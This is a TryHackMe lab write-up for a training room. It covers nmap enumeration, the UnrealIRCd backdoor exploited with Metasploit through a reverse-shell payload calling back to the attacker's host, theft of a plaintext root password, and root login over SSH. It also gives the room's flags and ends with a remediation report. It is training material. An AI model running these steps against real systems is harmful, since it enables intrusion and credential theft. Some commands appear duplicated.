July 7, 2026
Tryhackme — Guided Pentest: Infrastructure — writeup
Room : https://tryhackme.com/room/guidedpentestinfrastructure
By Hikmat Gasimov
3 min read
Badge I achieved
Learning Objectives
- Use tools and techniques to scan a Linux host
- Research vulnerable software to find a working exploit
- Enumerate local Linux files to escalate privileges
Prerequisites
- Metasploit module
- Nmap room
Scenario
You've just landed your first junior role as a penetration tester. For your first engagement, you will shadow your team lead.
It's Monday morning, and your project manager sends you an email and informs you that your biggest client, TryHatMe, recently deployed a new network device in their infrastructure. Start your AttackBox, make sure the target is online, and begin your pentest.
Enumuration
What port other than 22 is open on the target host?
nmap -sV -sC -oN scan.txt 10.113.190.213nmap -sV -sC -oN scan.txt 10.113.190.213A:6667
Vulneribility Analysis
Use searchsploit to find an exploit for your target UnrealIRC version. What is the path value for the Remote Downloader/Execute script?
A: linux/remote/13853.pl
Initial access
Step 1 : Gaining a Foothold By now you should have found an exploit for UnrealIRCd that abuses a backdoor left in the software. If you didn't find it, don't worry, it's a learning curve.
The good part about the exploit we are going to use is that there's a Metasploit module for it. This makes exploitation much easier than modifying exploit scripts. Let's fire up Metasploit first.
msfconsole
Then, search for the module we need.
search unrealircd.
From this list, we can use the suggested exploit against our target.
use 0
First, we need to see what we must configure for this exploit to run.
show options
show payloads
Step 2
Since we don't know much about our target or what software it has installed, the safest course is to use a Unix reverse generic payload.
set payload cmd/unix/reverse
Now, if we run show options again, we'll see that LHOST and LPORT are required for this payload.
set LHOST 10.113.126.74
set LPORT 443set LHOST 10.113.126.74
set LPORT 443Now that everything is set, we can launch our attack against the target machine using the exploit command.
What is the user-level flag?
THM{Pwned-Y0ur-First-Machine}
Post Exploition
Privilege Escalation
You can go ahead and inspect all these files, but one stands out from the rest: /etc/password.txt.
cat /etc/password.txt
root:PDLrCVl1pLD91U0JMmCzcat /etc/password.txt
root:PDLrCVl1pLD91U0JMmCz
We can read this with cat /etc/password.txt. Luckily for us, it seems to contain root credentials. Since we're not in an interactive terminal session, we won't be able to use su to enter the password. However, we know from our previous external enumeration that an SSH service is running on this host. Open a new terminal and run the following command:
ssh root@10.113.190.213ssh root@10.113.190.213
When prompted, enter the password you found previously in /etc/password.txt. Congrats, you now own this machine! You can find your flag in /root/flag.txt.
What is the root flag?
THM{Escalat1on-D0ne}
Reporting
Title: Root Password Stored in Plaintext
Severity: Critical
Description: The root user's password was found stored in plaintext within the file /etc/password.txt. This file was readable by low-privileged users, allowing any user with shell access to retrieve the root credentials and fully compromise the system.
Exploitation Steps:
- Obtain a low-privileged shell on the target system.
- Read the contents of
/etc/password.txtusingcat /etc/password.txt. - Use the discovered root password to escalate privileges via
ssh root@IP.
Recommendation: Remove the plaintext password file immediately and rotate the root password. Credentials should never be stored in plaintext on the filesystem. Implement a secrets management solution or use properly configured system authentication mechanisms (such as /etc/shadow with strong hashing). Additionally, enforce the principle of least privilege to restrict file access permissions.